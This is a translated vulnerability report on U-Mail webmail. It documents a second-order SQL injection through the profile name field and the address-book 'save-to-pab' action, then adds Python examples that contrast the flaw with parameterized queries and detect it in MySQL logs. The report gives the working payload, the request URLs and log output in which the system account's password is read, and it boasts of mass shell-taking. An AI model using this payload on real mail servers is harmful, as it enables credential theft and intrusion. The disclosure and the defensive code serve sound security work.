### Brief description:

U-Mail, don't cry. Also, wooyun-2010-093049 has been updated with an exp that needs no login and can get shells in batch; I tested it casually and easily got several hundred shells in one batch. This is very serious, please review it quickly, admins :)

### Details:

Vulnerable file: /client/oabshare/module/operates.php

Code:

```
if ( ACTION == "save-to-pab" ) {
    include_once( LIB_PATH."PAB.php" );
    $PAB = PAB::getinstance( );
    $maillist_id = gss( $_GET['maillist'] );
    $maillist_id = intval( $maillist_id );
    if ( $maillist_id ) {
        ......
    } else {
        $domain_id = gss( $_GET['domain_id'] );
        $user_ids = gss( $_GET['userlist'] );
        $user_ids = id_list_filter( $user_ids ); // WooYun-2014-74928
        if ( !$user_ids ) {
            dump_msg( "param_error", "参数错误!" );
        }
        $where = "t1.UserID IN (".$user_ids.")";
        // first the records are fetched from the database
        $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
        $user_all = $arr_tmp['data'];
        if ( !$user_all ) {
            dump_json( array( "status" => TRUE, "message" => "" ) );
        }
        foreach ( $user_all as $user ) {
            $qq = $msn = "";
            if ( strpos( $user['qqmsn'], "@" ) ) {
                $msn = $user['qqmsn'];
            } else {
                $qq = $user['qqmsn'];
            }
            if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) {
                $data = array(
                    "user_id"    => $user_id,
                    "fullname"   => $user['FullName'], // field content read from the database
                    "pref_email" => $user['email'],
                    "pref_tel"   => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
                    "birthday"   => $user['birthday'],
                    "im_qq"      => $qq,
                    "im_msn"     => $msn,
                    "updated"    => date( "Y-m-d H:i:s" )
                );
                // the values that were just read are passed straight into the add operation
                $res = $PAB->add_contact( $data, 0 );
                if ( !$res ) {
                    dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
                }
            }
        }
    }
    dump_json( array( "status" => TRUE, "message" => "" ) );
}
```

First, the second-order injection payload has to be put in place. The file that stores it is /client/option/module/o_userinfo.php

```
if ( ACTION == "userinfo" ) {
    $url = make_link( "option", "view", "userinfo" );
    $where = "UserID='".$user_id."'";
    $data = array(
        "FullName"    => gss( $_POST['fullname'] ), // the submitted value is written to the database
        "EnglishName" => gss( $_POST['englishname'] )
    );
    $result = $Mailbox->update_mailbox( $data, $where, 0 );
    if ( !$result ) {
        redirect( $url, "修改姓名时出现错误,修改失败!" );
    }
}
```

Single quotes and similar characters are stored in the database. The table structure is shown below:

![a.png](https://images.seebug.org/upload/201501/2216050334aefa1f4bce6a72ac91fbf155141a08.png)

A length of 100 is enough to read sensitive data. First log in as a user, go to the profile edit page, and enter the following in the Chinese name field:

```
',`homepage`=(SELECT password from userlist where userid=2)#
```

As shown:

![b.png](https://images.seebug.org/upload/201501/221605335dac43dd0939df3a6b4afcf9b7b694ac.png)

After saving, look up your own userid. The request is:

http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0006

As shown:

![c.png](https://images.seebug.org/upload/201501/2216060646e21096629f9f3c0ef760121f0b5964.png)

Then send the following request:

http://mail.fuck.com/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&domain_id=1&userlist=9

userlist is your own userid; domain_id is 1 by default. Once it has completed, open the personal address book, as shown:

![d.png](https://images.seebug.org/upload/201501/22160642131c53001b92005624ad28bff7bb094d.png)

In the blank spot is the password of the system account, as shown:

![e.png](https://images.seebug.org/upload/201501/22160718890932b6419ef64c5427f166f2ffb618.png)

![f.png](https://images.seebug.org/upload/201501/221607252c350ed1dba292c2552c8b4c84146c01.png)

The SQL executed in the two steps is as follows:

```
150122 15:54:44  2665 Connect   umail@localhost on
                 2665 Query     SET NAMES 'UTF8'
                 2665 Init DB   umail
                 2665 Query     UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='9'
                 2665 Query     UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='9'
                 2665 Quit
```

and

```
150122 15:57:16  2668 Connect   umail@localhost on
                 2668 Query     SET NAMES 'UTF8'
                 2668 Init DB   umail
                 2668 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 2668 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 2668 Query     SELECT contact_id FROM pab_contact WHERE user_id='9' AND pref_email='test0005@fuck.com' LIMIT 1
                 2668 Query     INSERT INTO pab_contact SET `user_id`='9',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test0005@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-22 15:57:16'
                 2668 Quit
```

### Proof of vulnerability:

As above.
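The two stages of the report rebuilt as an added example (not U-Mail code) in Python on an in-memory SQLite database. It shows why escaping at stage 1 (the `gss()` call in o_userinfo.php) does not protect stage 2 (the `add_contact` concatenation in operates.php), and places the vulnerable pattern beside a parameterized version. `setup()`, the table layouts, the `constructed-secret` value and the `gss()` stand-in (assumed here to double single quotes, which is SQLite's escape syntax; U-Mail's real `gss()` is not on the page) are all constructed for the example.

```python
import sqlite3

# The exact string the report enters in the Chinese-name field.
PAYLOAD_FROM_REPORT = "',`homepage`=(SELECT password from userlist where userid=2)#"


def setup():
    """Fresh in-memory database (constructed): a 'system' row with userid 2 and
    the test user with userid 9, mirroring the tables named in the log excerpt."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE userlist (userid INTEGER PRIMARY KEY, mailbox TEXT,
                               fullname TEXT, password TEXT);
        CREATE TABLE pab_contact (contact_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  fullname TEXT, pref_email TEXT, homepage TEXT);
        INSERT INTO userlist VALUES (2, 'system', 'System', 'constructed-secret');
        INSERT INTO userlist VALUES (9, 'test0006', '', '');
    """)
    return con


def gss(value):
    """Stand-in for U-Mail's gss() input filter (assumed behaviour; the real
    function is not on the page): escape a quote the way SQLite expects."""
    return value.replace("'", "''")


def stage1_update_fullname(con, user_id, submitted_name):
    """o_userinfo.php pattern: escape at input time, concatenate into UPDATE.
    The escaping is consumed by the SQL parser; the row stores the raw text."""
    con.execute("UPDATE userlist SET fullname='%s' WHERE userid=%d"
                % (gss(submitted_name), user_id))


def stage2_vulnerable(con, user_id):
    """operates.php / add_contact pattern: read the name back from the database
    and paste it into an INSERT without escaping. A stored quote is SQL again."""
    fullname, mailbox = con.execute(
        "SELECT fullname, mailbox FROM userlist WHERE userid=?", (user_id,)).fetchone()
    con.execute("INSERT INTO pab_contact (user_id, fullname, pref_email, homepage) "
                "VALUES (%d, '%s', '%s@example.invalid', '')"
                % (user_id, fullname, mailbox))


def stage2_hardened(con, user_id):
    """Same operation with bound parameters: a value read from the database is
    still data, whatever it contains, so no quoting context can be escaped."""
    fullname, mailbox = con.execute(
        "SELECT fullname, mailbox FROM userlist WHERE userid=?", (user_id,)).fetchone()
    con.execute("INSERT INTO pab_contact (user_id, fullname, pref_email, homepage) "
                "VALUES (?, ?, ?, '')", (user_id, fullname, mailbox + "@example.invalid"))


def run_demo(submitted_name):
    """Run stage 1, then each stage-2 variant on its own fresh database.
    Returns what was stored and what each variant did with it."""
    results = {}
    for label, stage2 in (("vulnerable", stage2_vulnerable), ("hardened", stage2_hardened)):
        con = setup()
        stage1_update_fullname(con, 9, submitted_name)
        stored = con.execute("SELECT fullname FROM userlist WHERE userid=9").fetchone()[0]
        try:
            stage2(con, 9)
            row = con.execute(
                "SELECT fullname, homepage FROM pab_contact WHERE user_id=9").fetchone()
            results[label] = {"stored": stored, "error": None,
                              "fullname": row[0], "homepage": row[1]}
        except sqlite3.OperationalError as exc:
            # The stored text reached the SQL parser as syntax: the injection point is real.
            results[label] = {"stored": stored, "error": str(exc),
                              "fullname": None, "homepage": None}
        con.close()
    return results


if __name__ == "__main__":
    for name in ("O'Brien", PAYLOAD_FROM_REPORT):
        print(repr(name), run_demo(name))
```

A plain name such as `O'Brien` is enough to show the defect: stage 1 stores it correctly, and the concatenating stage 2 then fails with a syntax error because the stored quote terminates the literal. The parameterized stage 2 stores both `O'Brien` and the report's payload verbatim as a contact name, and `homepage` stays empty, which is the behaviour the `add_contact` path needs.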
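For the MySQL general-log excerpt above, as an added example that is not part of the report: a small Python scanner that separates string literals from SQL structure in each logged statement and flags the two signatures the excerpt contains, a write whose literal carries a subquery (the stage-1 UPDATE) and a statement with a `#` comment outside any literal or with quoting out of sync (the stage-2 INSERT). `SAMPLE_LOG` reproduces the page's log lines with general-log tab layout; the regexes and finding names are the example's own.

```python
import re

# General-log "Query" rows: optional timestamp, thread id, command, statement.
LOG_QUERY = re.compile(r"^\s*(?:\d{6}\s+[\d:]{8}\s+)?(\d+)\s+Query\s+(.*)$")
# A literal that itself contains a subquery is the stage-1 indicator.
SQL_IN_LITERAL = re.compile(r"\(\s*select\b|\bunion\s+(?:all\s+)?select\b", re.I)
# MySQL comment starts that should never appear outside a literal in app-generated SQL.
COMMENT_OUTSIDE = re.compile(r"#|--\s")

# Constructed from the log lines in the report (tab-separated like a real general log).
SAMPLE_LOG = [
    "150122 15:54:44\t 2665 Connect\tumail@localhost on",
    "\t\t 2665 Query\tSET NAMES 'UTF8'",
    "\t\t 2665 Init DB\tumail",
    "\t\t 2665 Query\tUPDATE userlist SET `FullName`='\\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='9'",
    "150122 15:57:16\t 2668 Connect\tumail@localhost on",
    "\t\t 2668 Query\tSELECT contact_id FROM pab_contact WHERE user_id='9' AND pref_email='test0005@fuck.com' LIMIT 1",
    "\t\t 2668 Query\tINSERT INTO pab_contact SET `user_id`='9',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test0005@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-22 15:57:16'",
    "\t\t 2668 Quit\t",
]


def strip_literals(sql):
    """Replace every single-quoted literal with '' (honouring MySQL's \\' and ''
    escapes) and return (skeleton, literals, unterminated)."""
    out, lits, i, n = [], [], 0, len(sql)
    while i < n:
        if sql[i] != "'":
            out.append(sql[i])
            i += 1
            continue
        j, buf = i + 1, []
        while j < n:
            ch = sql[j]
            if ch == "\\" and j + 1 < n:            # backslash escape
                buf.append(sql[j + 1])
                j += 2
                continue
            if ch == "'":
                if j + 1 < n and sql[j + 1] == "'":  # doubled quote
                    buf.append("'")
                    j += 2
                    continue
                break                                # closing quote
            buf.append(ch)
            j += 1
        lits.append("".join(buf))
        if j >= n:                                   # quoting ran off the end
            out.append("'")
            return "".join(out), lits, True
        out.append("''")
        i = j + 1
    return "".join(out), lits, False


def analyze_query(sql):
    """Return the list of finding names for one statement (empty if clean)."""
    skeleton, lits, unterminated = strip_literals(sql)
    findings = []
    if unterminated:
        findings.append("unterminated_literal")
    if COMMENT_OUTSIDE.search(skeleton):
        findings.append("comment_outside_literal")
    if any(SQL_IN_LITERAL.search(lit) for lit in lits):
        findings.append("sql_in_stored_literal")
    return findings


def scan_log(lines):
    """Walk general-log lines and report the statements with findings."""
    hits = []
    for line in lines:
        m = LOG_QUERY.match(line)
        if not m:
            continue
        findings = analyze_query(m.group(2))
        if findings:
            hits.append({"thread": m.group(1), "findings": findings, "sql": m.group(2)[:80]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["thread"], hit["findings"], hit["sql"])
```

The stage-1 UPDATE is correctly quoted, so it only yields the weak `sql_in_stored_literal` signal; on its own that is just a user who typed SQL into a name field. The stage-2 INSERT yields both `comment_outside_literal` and `unterminated_literal`, which is the strong signal: the application built a statement whose structure was changed by data. Correlating the two across threads, as in the excerpt, is what distinguishes a second-order injection from a first-order one.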